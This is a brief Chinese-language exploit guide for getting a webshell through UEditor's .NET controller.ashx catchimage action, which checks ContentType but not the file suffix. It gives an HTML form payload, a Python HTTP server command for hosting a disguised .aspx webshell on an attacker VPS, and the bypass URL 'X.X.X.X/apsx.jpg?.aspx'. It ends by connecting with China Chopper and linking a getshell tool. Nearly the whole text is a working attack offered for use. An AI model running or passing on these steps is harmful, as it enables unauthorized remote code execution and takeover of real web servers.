漏洞存在點：

http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8

漏洞原因：controller.ashx檔案下只校驗ContentType而沒校驗檔案字尾導致getshell。

payload如下，並儲存為html格式

<form action="http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"enctype="application/x-www-form-urlencoded"  method
 
="POST">
    shell addr: <input type="text" name="source[]" />
                <input type="submit" value="Submit" />
</form>

在自己的VPS上啟動一個簡易的HTTP服務，並傳馬(可以不用圖片馬，直接改字尾名為jpg)

python -m SimpleHTTPServer 80

訪問自己的VPS即可看見服務已經啟動。

開啟上面含payload的html檔案

然後文字框中新增下面的連結，X.X.X.X是VPS地址

http://X.X.X.X/apsx.jpg?.aspx
 

點選提交

菜刀連線

伺服器這邊的記錄

另外附上GETSHELL的工具：https://github.com/theLSA/ueditor-getshell

還附上最近大佬的分析連結：https://xz.aliyun.com/t/8488